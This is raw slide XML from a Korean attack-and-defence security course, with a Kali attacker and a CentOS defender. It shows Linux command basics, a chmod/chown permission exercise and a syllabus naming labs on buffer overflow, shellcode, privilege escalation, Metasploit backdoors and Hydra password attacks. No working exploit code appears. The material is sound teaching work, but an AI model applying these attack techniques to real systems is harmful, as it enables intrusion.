            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 957"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="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932B58-AC0C-4366-93A7-7A6F08B092DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="251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endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="화살표: 오른쪽 12">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F81AA95-3EE1-4610-BE09-C37E81D839AF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202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/Theory/T2/3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#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ls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AF6558-568E-4777-99D4-A4F9B13500B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="5109376" cy="4940700"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="413467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0AC1EEE-5520-419D-B63B-801AA0EA6ADA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="4134678"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 957"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="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BAFEAF-1F5B-4B04-BB6F-31FB49C724CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="401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~]# cd /var/www/html/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webhack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/example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example]# ls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index.html  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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sqlin.php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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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xss.php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example]# ls -l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1100" dirty="0"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>12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-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>rwxrw-rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>- 1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303  7</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>3  2017 index.html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-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-r--r-- 1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439  7</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>3  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>sqlin.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/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-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>--r-- 1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303  8</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>23  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>xss.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/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example]# ls -a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  ..  index.html  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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sqlin.php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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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xss.php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example]# ls -al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합계 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20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drwxrwxrwx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2 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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root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4096  8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월 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23  2017 .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drwxrwxrwx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7 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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root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4096  3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월 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27  2018 ..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-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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rwxrw-rw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- 1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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root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 303  7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월  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  2017 index.html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-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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rw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-r--r-- 1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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root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 439  7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월  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3  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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sqlin.php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-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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rwxr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--r-- 1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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root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 303  8</a:t>
              </a:r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월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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23  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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xss.php</a:t>
              </a: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CBAA306-1D88-4A15-96F8-E388EFB7E860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6244426" y="1690688"/>
            <a:ext cx="5109376" cy="4940700"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="413467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C4E800B-8A77-4FC2-BF86-22EA3F3C1F51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="4134678"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 957"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="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932B58-AC0C-4366-93A7-7A6F08B092DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="251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endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="화살표: 오른쪽 12">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{982B7F67-ED70-4529-B941-47D2551C8E70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630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/Theory/T2/4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리눅스 기본 명령어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–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cp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AF6558-568E-4777-99D4-A4F9B13500B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="5109376" cy="4940700"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="413467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0AC1EEE-5520-419D-B63B-801AA0EA6ADA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="4134678"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 957"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="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BAFEAF-1F5B-4B04-BB6F-31FB49C724CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="450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~]# cd /var/www/html/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webhack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/example</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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CBAA306-1D88-4A15-96F8-E388EFB7E860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6244426" y="1690688"/>
            <a:ext cx="5109376" cy="4940700"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="413467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C4E800B-8A77-4FC2-BF86-22EA3F3C1F51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="4134678"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 957"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="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932B58-AC0C-4366-93A7-7A6F08B092DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="251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endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="화살표: 오른쪽 12">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD6D67F-2439-4058-B075-4F5F55B88440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306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DB76D06-7890-4F9A-83F7-8B62DE3EE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실습체계</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{395E791C-A04C-4AD6-BA61-7942735174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1202304"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="985266"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="791154">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2497152">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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링크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내용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3706695"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1231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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Unit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단위과제</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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585991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Scenario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시나리오</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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651176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A&amp;D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공격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&amp;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방어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133713"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="화살표: 오른쪽 4">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2946CB6B-4B9C-485B-A290-AD01CEDB4013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907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FB783FB6-F004-4D8A-9A51-99B6118E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단위과제</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4940BB54-D4E6-4689-9291-3F6BA3ACED57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내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71CB983-B45A-469D-9B07-B22AF388B0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2340209"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3112936" y="2690177"/>
          <a:ext cx="4932459" cy="1477645"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="446310">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2841996">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1644153">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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기호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내용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비고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3706695"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1231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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Sys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시스템</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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System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585991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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Net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네트워크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Network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651176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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Web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웹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Web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133713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Mal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악성코드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Malware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401460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Cip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암호 알고리즘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Cipher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518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625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781E677B-FFEB-44EC-B488-2C8509CC9B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4767760"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1814222" y="1953081"/>
          <a:ext cx="8563556" cy="3932054"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="871996">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4065764">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349857">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349858">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289816008"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349857">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2749103288"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349858">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="217882782"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349857">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2341448737"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1876509">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1029884743"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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링크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교육내용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선행 이론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실습 시 사용 프로그램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3706695"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1228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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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실습 구성도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611002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1228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hlinkClick r:id="rId3" action="ppaction://hlinksldjump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취약점 분석 및 점검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파일 접근 권한 설정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1018819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hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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취약점 분석 및 점검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시스템 로그 점검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651176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hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>3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취약점 분석 및 점검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 R-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명령어 제한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133713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hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>4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취약점 분석 및 점검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계정 원격 접속 탐지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tshark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401460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hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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취약점 분석 및 점검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계정 우회 접속 탐지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tshark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518544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hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>6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취약점 분석 및 점검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–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파일 접근 권한 설정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(Windows)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12555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hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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취약점 분석 및 점검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– FTP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서비스 설정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(Windows)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318716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hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>8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Buffer Overflow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공격 및 방어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복귀주소 조작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objdump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19258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hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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Buffer Overflow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공격 및 방어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쉘코드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실행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objdump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319792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hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>10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Buffer Overflow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공격 및 방어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힙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BOF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527480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hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>11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Format String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공격 및 방어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objdump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gcc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915602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hlinkClick r:id="rId14" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>12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권한상승 공격 및 방어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gcc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401317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hlinkClick r:id="rId15" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>13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백도어 공격 및 방어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Metasploit,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tshark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3178460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hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>14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비인가 접근 공격 및 방어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Hydra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429381"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl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id="{75E8C096-FA1A-4B00-8D9B-648A1C7B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시스템 문제 리스트</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="화살표: 오른쪽 4">
            <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2B21831-8B7B-4EC5-AA23-95145270147B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521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DB76D06-7890-4F9A-83F7-8B62DE3EE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목  차</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{395E791C-A04C-4AD6-BA61-7942735174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3342615"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="1231519"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="791154">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2497152">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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링크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내용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3706695"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1231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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Intro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서론</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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585991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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Theory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이론</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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651176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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Training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실습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133713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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Appendix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부록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401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3682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/Training/Unit/Sys/0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 0.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실습 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 218">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1786AD2-BA00-48D3-80AD-6000488CA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624" y="2310737"/>
            <a:ext cx="6154752" cy="2236526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14351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51630866-C6A1-45FD-AF61-E871A6EFF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69" y="5486400"/>
            <a:ext cx="10630230" cy="905247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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공격자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 kali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linux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의 모의침해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시스템 해킹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를 실습하며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이에 대응하여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방어자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 CentOS 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가 공격자가 더 이상 시스템에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00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위협을 가하지 못하도록</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00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시스템 설정 및 상황에 맞는 대응을 한다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029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/Training/Unit/Sys/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1.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파일 접근 권한 설정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4"/>
            <a:ext cx="4432683" cy="180000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/bin/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stty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파일의 소유자를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변경하고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소유자에게는 읽기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쓰기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실행 권한을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그룹 및 일반에게는 읽기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실행 권한만 부여하도록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변경하시오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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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9"/>
            <a:ext cx="4432682" cy="180000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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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파일의 접근 권한 변경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chmod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접근권한 파일명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파일의 소유자 변경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chown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소유자명 파일명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파일의 접근 권한을 설정 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endParaRPr lang="ko-KR" altLang="en-US" sz="12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(CentOS 6.4)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22722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7B355A65-614F-401A-B129-C717D9789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34" y="924349"/>
            <a:ext cx="4594860" cy="56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E070F3A2-B311-45EC-847A-FC2D9F8F0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37" y="2386275"/>
            <a:ext cx="4617720" cy="800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A57801-35B0-4CFA-BF2E-0C3E36B41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358739"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556470" y="3347160"/>
          <a:ext cx="4932807" cy="980186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484872426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접근 권한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103813"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6410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읽기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(r) = 4,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파일에 쓰기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(w) = 2,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실행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조합하여 접근 권한을 설정한다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예를 들어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읽기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쓰기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 권한을 모두 부여하는 경우에는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7(4 + 2 + 1)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지정하고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읽기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 권한만 부여하는 경우에는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5(4 + 1)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지정한다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67270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1) /bin/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stty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파일의 접근 권한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rwsr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sr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-x)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및 소유자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(root)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# ls –l /bin/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stty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dirty="0"/>
              <a:t>2) /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 접근 권한 변경</a:t>
            </a:r>
            <a:r>
